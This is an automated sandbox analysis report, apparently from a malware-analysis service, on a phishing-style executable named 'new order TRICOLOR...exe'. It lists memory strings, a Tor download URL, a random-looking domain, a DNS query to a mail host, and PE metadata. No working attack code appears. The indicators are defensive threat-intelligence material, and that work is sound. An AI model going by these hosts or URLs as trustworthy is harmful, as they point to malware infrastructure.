                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000002.292992821.0000000006872000.00000004.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.250202745.000000000566D000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.250729764.0000000005663000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.250373934.0000000005663000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.250906706.000000000566C000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/)
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.250336903.000000000566D000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.250373934.0000000005663000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp//
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.250729764.0000000005663000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.249804536.0000000005663000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/OsI
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.250729764.0000000005663000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.250336903.000000000566D000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.250373934.0000000005663000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.250906706.000000000566C000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/VsF
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.250906706.000000000566C000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Y0y
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.250202745.000000000566D000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/a
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.250729764.0000000005663000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.250906706.000000000566C000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/ch
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.250729764.0000000005663000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.250336903.000000000566D000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.250373934.0000000005663000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.250906706.000000000566C000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.250202745.000000000566D000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.250906706.000000000566C000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/OsI
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.250729764.0000000005663000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.250906706.000000000566C000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/ks
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.250729764.0000000005663000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.250373934.0000000005663000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.250906706.000000000566C000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/ms
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.250729764.0000000005663000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.250373934.0000000005663000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.250906706.000000000566C000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/ys;
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000002.292992821.0000000006872000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000002.292992821.0000000006872000.00000004.00000001.sdmpString found in binary or memory: http://www.sakkal.com
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000002.292992821.0000000006872000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000002.292992821.0000000006872000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.248682275.000000000566E000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.248549588.000000000569A000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.com
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.248499503.0000000005699000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.comD
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000002.292992821.0000000006872000.00000004.00000001.sdmpString found in binary or memory: http://www.typography.netD
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.255093562.000000000566E000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.de
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.255093562.000000000566E000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.de.T
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000002.292992821.0000000006872000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.255093562.000000000566E000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.deF
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.255093562.000000000566E000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.demM
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000002.292992821.0000000006872000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000005.00000002.523008375.0000000002DB1000.00000004.00000001.sdmpString found in binary or memory: https://gaOQV1SxHxPSyzn.com
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000002.290045970.0000000003769000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000005.00000000.282084634.0000000000402000.00000040.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000005.00000000.283151659.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000005.00000002.523008375.0000000002DB1000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
                      Source: unknownDNS traffic detected: queries for: mail.kyowasecurity.com.sg

                      System Summary:

                      barindex
                      Initial sample is a PE file and has a suspicious nameShow sources
                      Source: initial sampleStatic PE information: Filename: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe
                      .NET source code contains very large array initializationsShow sources
                      Source: 5.0.new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe.400000.4.unpack, u003cPrivateImplementationDetailsu003eu007b9182023Bu002d9602u002d4B7Eu002d88F7u002d3D12A60DF8AAu007d/u00323823707u002d2712u002d4FEEu002d9E00u002dE6693C4B0FA0.csLarge array initialization: .cctor: array initializer size 11950
                      Source: 5.0.new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe.400000.12.unpack, u003cPrivateImplementationDetailsu003eu007b9182023Bu002d9602u002d4B7Eu002d88F7u002d3D12A60DF8AAu007d/u00323823707u002d2712u002d4FEEu002d9E00u002dE6693C4B0FA0.csLarge array initialization: .cctor: array initializer size 11950
                      Source: 5.2.new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007b9182023Bu002d9602u002d4B7Eu002d88F7u002d3D12A60DF8AAu007d/u00323823707u002d2712u002d4FEEu002d9E00u002dE6693C4B0FA0.csLarge array initialization: .cctor: array initializer size 11950
                      Source: 5.0.new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe.400000.10.unpack, u003cPrivateImplementationDetailsu003eu007b9182023Bu002d9602u002d4B7Eu002d88F7u002d3D12A60DF8AAu007d/u00323823707u002d2712u002d4FEEu002d9E00u002dE6693C4B0FA0.csLarge array initialization: .cctor: array initializer size 11950
                      Source: 5.0.new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe.400000.8.unpack, u003cPrivateImplementationDetailsu003eu007b9182023Bu002d9602u002d4B7Eu002d88F7u002d3D12A60DF8AAu007d/u00323823707u002d2712u002d4FEEu002d9E00u002dE6693C4B0FA0.csLarge array initialization: .cctor: array initializer size 11950
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 0_2_025598E80_2_025598E8
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 0_2_025597900_2_02559790
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 0_2_07083F400_2_07083F40
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 0_2_07082D000_2_07082D00
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 0_2_070855700_2_07085570
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 0_2_07088C180_2_07088C18
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 0_2_0708D4580_2_0708D458
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 0_2_070864A00_2_070864A0
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 0_2_07084B800_2_07084B80
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 0_2_0708D9280_2_0708D928
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 0_2_070800400_2_07080040
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 0_2_07087F400_2_07087F40
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 0_2_07087F500_2_07087F50
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 0_2_070897B10_2_070897B1
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 0_2_070897D80_2_070897D8
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 0_2_0708DE500_2_0708DE50
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 0_2_07083E9B0_2_07083E9B
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 0_2_07083EF10_2_07083EF1
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 0_2_070855600_2_07085560
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 0_2_0708C5B00_2_0708C5B0
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 0_2_070885C80_2_070885C8
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 0_2_070885D80_2_070885D8
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 0_2_07088C080_2_07088C08
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 0_2_070833300_2_07083330
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 0_2_070833400_2_07083340
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 0_2_0708CB680_2_0708CB68
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 0_2_07084B700_2_07084B70
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 0_2_070863A00_2_070863A0
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 0_2_070873A10_2_070873A1
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 0_2_070873B00_2_070873B0
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 0_2_070863FB0_2_070863FB
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 0_2_07088A400_2_07088A40
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 0_2_070882580_2_07088258
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 0_2_07088A500_2_07088A50
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 0_2_070882680_2_07088268
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 0_2_0708F1180_2_0708F118
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 0_2_070888000_2_07088800
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 0_2_070888100_2_07088810
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 0_2_0CF100400_2_0CF10040
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 0_2_0CF1210A0_2_0CF1210A
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 0_2_0CF144800_2_0CF14480
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 0_2_0CF100060_2_0CF10006
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 0_2_0CF122AA0_2_0CF122AA
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 5_2_01122D505_2_01122D50
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 5_2_0112DFD85_2_0112DFD8
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 5_2_01121FF05_2_01121FF0
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 5_2_011226185_2_01122618
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 5_2_01129DB85_2_01129DB8
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 5_2_011EC5105_2_011EC510
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 5_2_011E55585_2_011E5558
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 5_2_011E19705_2_011E1970
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 5_2_011E00405_2_011E0040
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 5_2_011E78F85_2_011E78F8
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 5_2_011E40E85_2_011E40E8
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 5_2_011E00065_2_011E0006
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 5_2_011E4E505_2_011E4E50
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 5_2_011E82F85_2_011E82F8
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 5_2_013E48005_2_013E4800
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 5_2_013E3D2C5_2_013E3D2C
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 5_2_013E3EB85_2_013E3EB8
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 5_2_013E47705_2_013E4770
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 5_2_013E47505_2_013E4750
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 5_2_013E47F35_2_013E47F3
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 5_2_013E54F05_2_013E54F0
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 5_2_013ED8005_2_013ED800
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000002.290045970.0000000003769000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameMajorRevision.exe< vs new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000002.290045970.0000000003769000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameuhljaIlIyVxZXxXUzeXkqULlxd.exe4 vs new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000002.290045970.0000000003769000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameVHbIB.exe8 vs new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000002.287974260.0000000002761000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameBunifu.UI.dll4 vs new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000002.287974260.0000000002761000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameuhljaIlIyVxZXxXUzeXkqULlxd.exe4 vs new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000002.287974260.0000000002761000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameMajorRevision.exe< vs new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000000.243922147.000000000030C000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameVHbIB.exe8 vs new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000002.293338597.0000000006F70000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameMajorRevision.exe< vs new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000005.00000002.518319405.0000000000ABC000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameVHbIB.exe8 vs new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000005.00000000.283151659.0000000000402000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameuhljaIlIyVxZXxXUzeXkqULlxd.exe4 vs new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeBinary or memory string: OriginalFilenameVHbIB.exe8 vs new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: aUkURZiJ.exe.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeReversingLabs: Detection: 41%
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeFile read: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeJump to behavior
